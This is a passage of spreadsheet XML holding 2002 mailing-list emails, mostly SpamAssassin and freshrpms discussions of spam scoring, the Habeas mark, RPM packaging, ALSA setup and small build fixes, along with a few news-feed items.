having the build fail when files are present in the build root but not listed in the %files section. I should remove them manually as part of the build process... or maybe the new "%exclude /path/to/file" in the %files section would do, but I don't know how older versions of rpm would handle it. On my (null) build system, I've simply set the variable : %_unpackaged_files_terminate_build 0 Matthias --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: Geege &lt;grlygrl201@aol.com&gt;\nFrom: Owen Byrne &lt;owen@permafrost.net&gt;\nDate: Thu, 29 Aug 2002 12:06:43 -0300</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 12:06:43 -0300</t>
  </si>
  <si>
    <t>Geege &lt;grlygrl201@aol.com&gt;</t>
  </si>
  <si>
    <t>Re: Rambus, Man</t>
  </si>
  <si>
    <t>--------------090602010909000705010009 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit Geege wrote: &gt;This message was sent to you from [URL]http://www.idg.net[/URL] &gt; &gt;Geege would like you to read the story below: &gt; &gt;[URL]http://www.idg.net[/URL] &gt; &gt;Title: &gt;A first look at the 2.8-GHz Pentium 4 &gt; &gt;Summary: &gt;Latest Rambus memory plus fast bus appear to give Intel's newest P4 the jolt it needs. &gt; &gt;Geege attached the following message: &gt;------------------------------------------------------------ &gt;ha ha ha harley.  rambus earns it. &gt;------------------------------------------------------------ &gt; &gt;Stay on top of the world of Information Technology with your own &gt;FREE subscription to our specialized newsletters. Subscribe now &gt;at [URL]http://www.idg.net[/URL] &gt; &gt; &gt;7132 &gt; &gt;   &gt; The overclockers have given it another jolt, perhaps to potential sales  (and maybe sales of liquid nitrogen): via slashdot Owen [URL]http://www.muropaketti.com[/URL] *Pivmr:* 26.8.2002 *Artikkeli:* Intel Northwood 2,8GHz *Tekij:* Sampsa Kurri  *English Summary* When the Intel Pentium 4 2,8GHz CPU arrived to our testlab we ordered 10  liters of Liquid Nitrogen (LN2 -196C) and decided to run some tests in  very low temperatures. After some adjusting and testing we were able to run SiSoft Sandra CPU  and Memory benchmarks and Pifast benchmark smoothly when the CPU was  running at 3917MHz. We raised the FSB one more step and managed to run  succesfully SuperPi benchmark while CPU was running at 3998MHz. The  result was 39 seconds. Test setup: P4 2,8GHz, Modified Asus P4T533-C, Samsung PC800 RDRAM, PNY  GeForce 4 MX440 and Windows XP OS. Check out the pictures. --------------090602010909000705010009--</t>
  </si>
  <si>
    <t>http://www.idg.net http://www.idg.net http://www.idg.net http://www.muropaketti.com</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Lars Hansson &lt;lars@unet.net.ph&gt;\nDate: Thu, 29 Aug 2002 11:27:25 +0800</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 11:27:25 +0800</t>
  </si>
  <si>
    <t>Lars Hansson &lt;lars@unet.net.ph&gt;</t>
  </si>
  <si>
    <t>On Wed, 28 Aug 2002 17:45:49 -0700 Brian McNett  wrote: &gt; The first court cases were actually concluded years ago. These  &gt; include many legal precedents which are used to protect the  &gt; rights of ISPs to block mail, and to terminate service to  &gt; spammers. Yeah, but these would be different cases relating to copyright infringements, not about ISP's blocking mail or not. --- Lars Hansson ------------------------------------------------------- This sf.net email is sponsored by: Jabber - The world's fastest growing  real-time communications platform! Don't just IM. Build it in!  [URL]http://www.jabber.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Spamassassin-Talk &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: bob@proulx.com (Bob Proulx)\nDate: Thu, 29 Aug 2002 10:32:57 -0600</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 10:32:57 -0600</t>
  </si>
  <si>
    <t>Spamassassin-Talk &lt;spamassassin-talk@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>--9amGYk9869ThD9tj Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Justin Mason  [2002-08-29 17:00:12 +0100]: &gt; Well, my point is more that we should aim our rescoring algorithm so that &gt; a spam hits 5.0.    Any higher does us no good, as it means an FP is &gt; a lot harder to recover from, using compensation rules. Agreed. But I have always thought that the value 5 was not the best value.  It should have been 0.  I understand that initially only spammy scores were included.  But I believe the algorithm should be purely symmetrical and non-spammy negative values should also have been balancing out the spammy positive values, like they do in SA today. Then anything that was positive would be spam and anything negative would be non-spam.  (And I guess exactly zero is grey. :-) Today's choice of 5 just adds an offset.  Which I think cause people to assume things work differently than they do. Bob --9amGYk9869ThD9tj Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQE9bky50pRcO8E2ULYRAjI6AJwMoi8s2IUg4XpVAwCqpBC3gcd/cQCfepOm COS03YufMiFLSHhCZ8KkLxU= =YwM7 -----END PGP SIGNATURE----- --9amGYk9869ThD9tj-- ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "Clayton, Nik [IT]" &lt;nik.clayton@citigroup.com&gt;\nFrom: Daniel Rogers &lt;rogersd@nanaimo.island.net&gt;\nDate: Thu, 29 Aug 2002 09:17:45 -0700</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 09:17:45 -0700</t>
  </si>
  <si>
    <t>Daniel Rogers &lt;rogersd@nanaimo.island.net&gt;</t>
  </si>
  <si>
    <t>"Clayton, Nik [IT]" &lt;nik.clayton@citigroup.com&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] UPPERCASE_* rules and foreign character sets</t>
  </si>
  <si>
    <t>On Thu, Aug 29, 2002 at 11:37:02AM +0100, Clayton, Nik [IT] wrote:\n&gt; Have the UPPERCASE_* rules been tested on messages in non-English \n&gt; character sets, and/or where the message is MIME encoded in some way?\n&gt; \n&gt; I'm getting a lot of false positives on Japanese mail, and I think the \n&gt; encoding is responsible for triggering this rule.\n\nLike Justin said, this is fixed in CVS.\n\nDan.\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Brent Welch &lt;welch@panasas.com&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Thu, 29 Aug 2002 09:00:08 -0500</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 09:00:08 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_948625160P Content-Type: text/plain; charset=us-ascii &gt; From:  Brent Welch  &gt; Date:  Wed, 28 Aug 2002 22:40:21 -0700 &gt; &gt; Well, I've used the check-the-modify-time cache trick for files in &gt; many places (not just exmh) so some part of me certainly thinks it &gt; is effective.  However, it occurred to me that if we do checkpoint &gt; state, then aren't we modifying the sequences file for the current &gt; folder on every message read?  Perhaps we look at the sequences file &gt; more than once per message view?   As I'd written the code a few months ago, we were reading the sequences file  first to see what sequences were in it and then once per sequence.  This  happens anywhere that we look at sequences, most notably in Ftoc_ShowSequences. That seemed to be an obvious lose performancewise, but I wanted my abstraction to  have a separate call for "what sequences are in this folder?" and "what  messages are in this sequence?".  One option would have been to add another  call to get the data off of disk, but I felt that the check-the-modify-time  technique would be less error-prone. I think the biggest gains would be from augmenting Ftoc_ShowSequences to allow  a finer specification of what needs to be updated in the ftoc so that the  current code would only be run when we really do have to update all sequences  for all messages.  I described these thoughts in an email message yesterday. And again, if it can wait a few weeks, I'm willing to do it. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_948625160P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9bijoK9b4h5R0IUIRApBEAJ9XB23cpckpVw7zWH/Uk1cG6rMCmQCfcNN9 6I86NmGOWTSr1zajO3HHPnA= =sApX -----END PGP SIGNATURE----- --==_Exmh_948625160P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Spamassassin-Talk &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: Bart Schaefer &lt;schaefer@zanshin.com&gt;\nDate: Thu, 29 Aug 2002 08:32:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 08:32:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>On 28 Aug 2002, Daniel Quinlan wrote: &gt; Dan Kohn  writes: &gt;  &gt; &gt; Daniel, it's easy enough for you to change the Habeas scores yourself &gt; &gt; on your installation.  If Habeas fails to live up to its promise to &gt; &gt; only license the warrant mark to non-spammers and to place all &gt; &gt; violators on the HIL, then I have no doubt that Justin and Craig will &gt; &gt; quickly remove us from the next release.  But, you're trying to kill &gt; &gt; Habeas before it has a chance to show any promise. &gt;  &gt; I think I've worked on SA enough to understand that I can localize a &gt; score.  I'm just not comfortable with using SpamAssassin as a vehicle &gt; for drumming up your business at the expense of our user base. I have to agree here.  If Habeas is going to die just because SA does not support it, that's a serious problem with the business model; but that is nobody's problem but Habeas's. A possible solution is for Habeas's business model to include some kind of incentive for users of SA to give it the benefit of the doubt.  I have yet to think of an incentive that fits the bill ... On Thu, 29 Aug 2002, Justin Mason wrote: &gt; I don't see a problem supporting it in SpamAssassin -- but I see Dan's &gt; points. &gt;  &gt;   - high score: as far as I can see, that's because SpamAssassin is &gt;     assigning such high scores to legit newsletters these days, and the &gt;     Habeas mark has to bring it down below that. :(   IMO we have to fix &gt;     the high-scorers anyway -- no spam ever *needs* to score over 5 in our &gt;     scoring system, 5 == tagged anyway. This is off the topic of the rest of this discussion, but amavisd (in all its incarnations) and MIMEDefang and several other MTA plugins all reject at SMTP time messages that scores higher than some threshold (often 10).   If some new release were to start scoring all spam no higher than 5.1, there'd better be _zero_ FPs, because all those filters would drop their thresholds to 5. On Thu, 29 Aug 2002, Michael Moncur wrote: &gt; But I agree that there needs to be more focus on eliminating rules that &gt; frequently hit on newsletters. If any newsletters actually use the Habeas &gt; mark, that will be one way to help. Newsletters won't use the mark.  Habeas is priced way too high -- a factor of at least 20 over what the market will bear, IMO -- on a per-message basis for most typical mailing lists (Lockergnome, say) to afford it. On Thu, 29 Aug 2002, Harold Hallikainen wrote: &gt; Habeus has come up with a very clever way to use existing law to battle &gt; spam. It seems that at some point they could drop the licensing fee to &gt; $1 or less and make all their income off suing the spammers for &gt; copyright infringement. Sorry, that just can't work. If the Habeas mark actually becomes both widespread enough in non-spam, and effectively-enforced enough to be absent from spam, such that, e.g., SA could assign a positive score to messages that do NOT have it, then spammers are out of business and Habeas has no one to sue.  There's nobody left to charge except the people who want (or are forced against their will because their mail won't get through otherwise) to use the mark. Conversely, if there are enough spammers forging the mark for Habeas to make all its income suing them, then the mark is useless for the purpose for which it was designed. Either way it seems to me that, after maybe a couple of lawsuits against real spammers and a lot of cease-and-desist letters to clueless Mom&amp;Pops, then either (a) they're out of business, (b) they have to sell the rights to use the mark to increasingly questionable senders, or (c) they've both created and monopolized a market for "internet postage stamps" that everybody has to pay them for. The latter would be quite a coup if they [*] could pull it off -- they do absolutely nothing useful, unless you consider threatening people with lawsuits useful, yet still collect a fee either directly or indirectly from everyone on the internet -- effectively we'll be paying them for the privilege of policing their trademark for them.  I don't believe they'll ever get that far, but I don't particularly want to help them make it. [*] And I use the term "they" loosely, because the whole company could  consist of one lawyer if it really got to that point. ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-commits@example.sourceforge.net\nFrom: Justin Mason &lt;yyyyason@users.sourceforge.net&gt;\nDate: Thu, 29 Aug 2002 06:37:45 -0700</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 06:37:45 -0700</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin procmailrc.example,1.3,1.3.2.1</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin In directory usw-pr-cvs1:/tmp/cvs-serv7642 Modified Files:       Tag: b2_4_0 	procmailrc.example  Log Message: added length limit to sample procmail recipe Index: procmailrc.example =================================================================== RCS file: /cvsroot/spamassassin/spamassassin/procmailrc.example,v retrieving revision 1.3 retrieving revision 1.3.2.1 diff -b -w -u -d -r1.3 -r1.3.2.1 --- procmailrc.example	16 Aug 2002 18:34:27 -0000	1.3 +++ procmailrc.example	29 Aug 2002 13:37:43 -0000	1.3.2.1 @@ -1,5 +1,7 @@ -# Pipe the mail through spamassassin +# Pipe the mail through spamassassin, unless it's over 256k +# (SpamAssassin can take a long time to process large messages)  :0fw +* &lt; 256000  | spamassassin    # Move it to the "caughtspam" mbox if it was tagged as spam ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Spamassassin-commits mailing list Spamassassin-commits@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Thu, 29 Aug 2002 06:26:38 +0200</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 06:26:38 +0200</t>
  </si>
  <si>
    <t>Once upon a time, Lance wrote : &gt; Ok, I got ALSA installed and there is no static inbetween mp3s like &gt; before which is great!  My setup is digital 4.1 but sound is only coming &gt; from front 2 speakers and subwoofer, rear speakers there is no sound.  &gt; Also alsamixer or aumix are unresponsive as well.  Maybe you could find more info or tips on the ALSA page for your card? Also, you could try "alsactl store", editing /etc/asound.state" by hand (for me it contains data similar to what I can control with "alsamixer") then run "alsactl restore" and see if you're able to change what you want that way. Matthias --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: FoRK &lt;FoRK@xent.com&gt;\nFrom: Eirikur Hallgrimsson &lt;eh@mad.scientist.com&gt;\nDate: Thu, 29 Aug 2002 03:58:03 -0400</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 03:58:03 -0400</t>
  </si>
  <si>
    <t>Internet saturation (but not in Iceland)</t>
  </si>
  <si>
    <t>Gary's news service at teledyn.com has an article on Internet Saturation.\n\nLet me ask you....If you were on a rock in the middle of the Atlantic, \nmostly in the dark for half the year, wouldn't *you* like a bit of \ninternet distraction?   They've already done the obvious and fiber-ringed \nthe island.\n\nEirikur\n\n--------\n\nLatest guestimate stats from Ireland's NUA show a flattening Internet \npopulation growth. It seems there's two kinds of people, those who will go \nonline with the status quo, and those who won't: Canada levels out at 53%, \nthe USA at 59% (since 2000!), Denmark flatlines at 60%, Norway at 54%, \nSweden at 64%, and the UK at 55% ... only Iceland continues unfettered \nbeyond 60%. Could this be evidence of a usability barrier? If so, it's a \nclear signal that there's as much fortune to be gained from a \nsubstantially new Internet interface than all that has been gained so far.\nLatest guestimate stats from Ireland's NUA show a flattening Internet \npopulation growth. It seems there's two kinds of people, those who will go \nonline with the status quo, and those who won't: Canada levels out at 53%, \nthe USA at 59% (since 2000!), Denmark flatlines at 60%, Norway at 54%, \nSweden at 64%, and the UK at 55% ... only Iceland continues unfettered \nbeyond 60%. Could this be evidence of a usability barrier? If so, it's a \nclear signal that there's as much fortune to be gained from a \nsubstantially new Internet interface than all that has been gained so far.\n\n[URL]http://www.nua.ie[/URL]</t>
  </si>
  <si>
    <t>http://www.nua.ie</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Thu, 29 Aug 2002 00:50:25 +0200</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 00:50:25 +0200</t>
  </si>
  <si>
    <t>Once upon a time, Ville wrote : &gt; Ah!  The mixer stuff was what made me look for an init script in the &gt; first place, I didn't bother to check whether the existing stuff would &gt; have worked with that.  Will try that out, you can assume silence == &gt; success :) Well, from what I've tried, both the main and the PCM (at least) volume levels can be controlled either by "alsamixer" or the good old "aumix". &gt; &gt; &gt;From what I can tell after only 2 days using it : ALSA rocks, &gt; &gt; &gt;especially &gt; &gt; since having a full OSS compatibility results that it breaks nothing at &gt; &gt; all! :-) &gt;  &gt; Agreed.  Though with only 2 hours experience... I guess/hope some other people from the list will try it out ;-) Both problems you reported (libasound.so and wrong xine dependency) are now fixed in the current packages. Oh, it's maybe also worth pointing out : I've implemented at last sorting by both last change date and alphabetically for my "build list" in the php code : [URL]http://freshrpms.net[/URL] And yes, I accept patches/comments/suggestions about all those spec files! Matthias --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: Daniel Quinlan &lt;quinlan@pathname.com&gt;\nFrom: Skip Montanaro &lt;skip@pobox.com&gt;\nDate: Thu, 29 Aug 2002 00:44:53 -0500</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 00:44:53 -0500</t>
  </si>
  <si>
    <t>Skip Montanaro &lt;skip@pobox.com&gt;</t>
  </si>
  <si>
    <t>Daniel Quinlan &lt;quinlan@pathname.com&gt;</t>
  </si>
  <si>
    <t>DanQ&gt; I think it would make more sense to start Habeas with a less\n    DanQ&gt; aggressive score (one which will not give spammers a quick path\n    DanQ&gt; into everyone's inbox) and after we've seen evidence that the\n    DanQ&gt; system works, then we can increase the magnitude of the score.\n\nBetter yet, let the GA figure out the correct score. ;-) That will obviously\ntake awhile since you'll have to acquire enough messages with it, but it\nshould give you a good idea if the presence of Habeus headers are good spam\nindicators or not.  If they are, my guess is that Habeus will probably not\nsucceed.\n\nTaking things further off-topic: Does Habeus charge a license fee to\norganizations who want to use their copyrighted material or is their sole\nrevenue stream to come from legal judgements?  On the one hand, if they\ncharge license fees, I'd worry that when times got tough they'd be somewhat\nless critical of organizations we'd call spammers today in order to generate\nlicense fees.  If not, I'd worry the pendulum would swing the other way and\nthey'd go after legitimate businesses in an attempt to generate more\nrevenues from judgements and/or out of court settlements.  Either way, it\nseems like they have an interesting tightrope to walk.\n\n-- \nSkip Montanaro\nskip@pobox.com\nconsulting: [URL]http://manatee.mojam.com[/URL]\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://manatee.mojam.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: Don Newcomer &lt;newcomer@dickinson.edu&gt;\nFrom: Rick Beebe &lt;richard.beebe@yale.edu&gt;\nDate: Thu, 29 Aug 2002 00:42:56 -0400</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 00:42:56 -0400</t>
  </si>
  <si>
    <t>Rick Beebe &lt;richard.beebe@yale.edu&gt;</t>
  </si>
  <si>
    <t>Don Newcomer wrote:\n&gt; I'm a new user (or about to be, hopefully) of SA but I've run into some\n&gt; compilation errors that prevent me from installing.  Rather than picking\n&gt; through the code, I thought I'd avoid reinventing the wheel and ask here.\n&gt; When I run the 'make', I get the following:\n&gt; \n&gt; cc: Error: spamd/spamc.c, line 50: In this declaration, "in_addr_t" has no\n&gt; linka\n&gt; ge and has a prior declaration in this scope at line number 572 in file\n&gt; /usr/inc\n&gt; lude/sys/types.h. (nolinkage)\n&gt; typedef unsigned long   in_addr_t;      /* base type for internet address\n&gt; */\n\nDon't worry about the warnings. To fix the error, edit spamc.c and right \nafter the line that says:\n\n#define EX__MAX 77\n\nAdd:\n\n#if !defined __osf__\nextern char *optarg;\ntypedef unsigned long   in_addr_t;      /* base type for internet address */\n#endif\n\n(you're adding the two lines that start with #).\n\n--Rick\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: felicity@kluge.net\nFrom: "Justin Mason" &lt;yyyy@spamassassin.taint.org&gt;\nDate: Thu, 29 Aug 2002 00:34:17 +0100 (IST)</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 00:34:17 +0100 (IST)</t>
  </si>
  <si>
    <t>felicity@kluge.net</t>
  </si>
  <si>
    <t>&gt; t/db_based_whitelist.Use of bare &lt;&lt; to mean &lt;&lt;"" is deprecated at &gt; ../lib/Mail/SpamAssassin/HTML.pm line 1. Use of bare &lt;&lt; to mean &lt;&lt;"" is &gt; deprecated at ../lib/Mail/SpamAssassin/HTML.pm line 6. Unquoted string hmm, could you check your installation?  those chars aren't in my version at all. --j. ------------------------------------------------------- This sf.net email is sponsored by: Jabber - The world's fastest growing  real-time communications platform! Don't just IM. Build it in!  [URL]http://www.jabber.com[/URL] _______________________________________________ Spamassassin-devel mailing list Spamassassin-devel@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Thu, 29 Aug 2002 00:15:03 +0200</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 00:15:03 +0200</t>
  </si>
  <si>
    <t>Once upon a time, Ville wrote : &gt; Ok, some more nits: alsa-xmms doesn't work if I don't have &gt; alsa-lib-devel installed, but xmms dies on startup telling me: &gt;  &gt;    Cannot load alsa library: libasound.so: cannot open shared object &gt;    file: No such file or directory &gt;  &gt; libasound.so is part of alsa-lib-devel... if I install it, the ALSA XMMS &gt; output plugins works fine. OK, will fix :-) &gt; I can't install the xine stuff, because xine-libs needs libGLcore.so.1, &gt; which I can't find anywhere (NVidia stuff?  I have Radeon 7500...) Argh, got bitten again! :-( Will fix too... Thanks a lot for pointing these out! Matthias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Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Thu, 29 Aug 2002 00:06:06 +0200</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 00:06:06 +0200</t>
  </si>
  <si>
    <t>Once upon a time, Ville wrote : &gt; &gt; Thanks a *lot* !  The RPMs seem to be fine, they worked for me out of &gt; &gt; the box (on vanilla Valhalla w/latest errata). &gt;  &gt; ...except that I don't see an init script in the RPMs, a sample one &gt; designed for RH is supposed to be in "utils/alsasound".  Could you take &gt; a look if it can be included? It doesn't need to as Red Hat Linux already sets correct permissions on all ALSA audio devices for locally logged in users (through the console.perms file) and the modules.conf files takes care of loading the right modules on demand. Also, aumix and the scripts that come with Red Hat Linux still work for controlling the volume, so it's still saved and restored when the computer is halted, even using ALSA. I'm glad you got your card working with these! I'm now wondering if I won't maybe buy an amplifier that supports Dolby Digial decoding (my current one "only" does PRo Logic) since I've read that ALSA supports the S/PDIF optical output of the sound chip of my Shuttle! ([URL]http://freshrpms.net[/URL] &gt;&gt;From what I can tell after only 2 days using it : ALSA rocks, especially since having a full OSS compatibility results that it breaks nothing at all!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lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: "Michael Moncur" &lt;mgm@starlingtech.com&gt;\nDate: Thu, 29 Aug 2002 00:04:14 -0600</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 00:04:14 -0600</t>
  </si>
  <si>
    <t>&gt; I think I've worked on SA enough to understand that I can localize a\n&gt; score.  I'm just not comfortable with using SpamAssassin as a vehicle\n&gt; for drumming up your business at the expense of our user base.\n\nThis is exactly what I think. SpamAssassin has always been conservative\nabout adding unproven RBLs and such, and this should be the same.\n\n&gt; I think it would make more sense to start Habeas with a less aggressive\n&gt; score (one which will not give spammers a quick path into everyone's\n&gt; inbox) and after we've seen evidence that the system works, then we can\n&gt; increase the magnitude of the score.\n\nI say start it with a zero score and put it in 70_cvs_rules_under_test like\nany other unproven rule. Then score it based on actual results, not\npromises. My corpus does not yet contain a single non-spam (or spam) message\nwith a Habeas mark. Based on that, it doesn't impress me and it wouldn't\nimpress the GA either. Rules with exactly the same statistics are being\ndropped from SA right now, and I don't see why this should be any different.\n\n--\nMichael Moncur  mgm at starlingtech.com  [URL]http://www.starlingtech.com[/URL]\n"Furious activity is no substitute for understanding." --H. H. Williams\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "FoRK" &lt;fork@spamassassin.taint.org&gt;\nFrom: "John Hall" &lt;johnhall@evergo.net&gt;\nDate: Thu, 26 Sep 2002 16:37:27 -0700</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 16:37:27 -0700</t>
  </si>
  <si>
    <t>RE: Liberalism in America</t>
  </si>
  <si>
    <t>In essence, hindsight justification.  The progressives weren't in the\nmiddle, they were in a society at one end and they wanted a society at\nthe other end.  The middle is more or less where they got stopped.\n\nAs to an intervention that worked, I actually have some nice things to\nsay about the SEC, at least in theory.  I have a few nasty things to say\nas well, but on the whole it has been a very good thing.\n\n\n&gt; -----Original Message-----\n&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of\nGeege\n&gt; Schuman\n&gt; Sent: Tuesday, September 24, 2002 6:37 PM\n&gt; To: fork@spamassassin.taint.org\n&gt; Subject: Liberalism in America\n&gt; \n&gt; liberalism\n&gt; propagandized as meddling\n&gt; in truth, the middle\n&gt; \n&gt; "American liberalism believes that in this respect it has made a major\n&gt; contribution to the grand strategy of freedom. Where both capitalists\nand\n&gt; socialists in the 1930's were trying to narrow the choice to either/or\n--\n&gt; either laissez-faire capitalism or bureaucratic socialism -- the New\nDeal\n&gt; persisted in its vigorous faith that human intelligence and social\n&gt; experiment could work out a stable foundation for freedom in a context\nof\n&gt; security and for security in a context of freedom. That faith remains\nthe\n&gt; best hope of free society today."\n&gt; \n&gt; fluid yet crunchy,\n&gt; gg\n&gt; \n&gt; \n&gt; \n&gt; \n&gt;  [URL]http://www.english.upenn.edu[/URL]</t>
  </si>
  <si>
    <t>http://www.english.upenn.edu</t>
  </si>
  <si>
    <t>To: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nFrom: Eugen Leitl &lt;eugen@leitl.org&gt;\nDate: Thu, 26 Sep 2002 16:08:14 +0200 (CEST)</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 16:08:14 +0200 (CEST)</t>
  </si>
  <si>
    <t>Re: dumb question: X client behind a firewall?</t>
  </si>
  <si>
    <t>On Wed, 25 Sep 2002, Joseph S. Barrera III wrote:\n\n&gt; Let's say you're behind a firewall and have a NAT address.\n&gt; Is there any way to telnet to a linux box out there in the world\n&gt; and set your DISPLAY in some way that you can create\n&gt; xterms on your own screen?\n\nAs other people suggested: SSH. PuTTY \n\n	[URL]http://www.chiark.greenend.org.uk[/URL]\n\ncan do it. Can run, say xclock (I'm running an X server under W32 at work,\ntunneling through a NAT box), but from Linux, not from Solaris.  Probably\nOpenSSH misconfigurat5ion.</t>
  </si>
  <si>
    <t>http://www.chiark.greenend.org.uk</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:32:47 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:32:47 -0000</t>
  </si>
  <si>
    <t>Cloud of anti-atoms created</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8015195,1440/\nDate: Not supplied\n\nResearchers say they have made at least 50,000 atoms of cold antihydrogen - \nanalysing them may reveal why antimatter is so rare</t>
  </si>
  <si>
    <t>Iraq invasion could 'worsen terrorist threat'</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8015194,1440/\nDate: Not supplied\n\nAn influential think tank warns that "regime change" could disperse weapons \nstockpiles into the murky world of global terrorism</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:32:42 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:32:42 -0000</t>
  </si>
  <si>
    <t>Africa's deserts are in "spectacular" retreat</t>
  </si>
  <si>
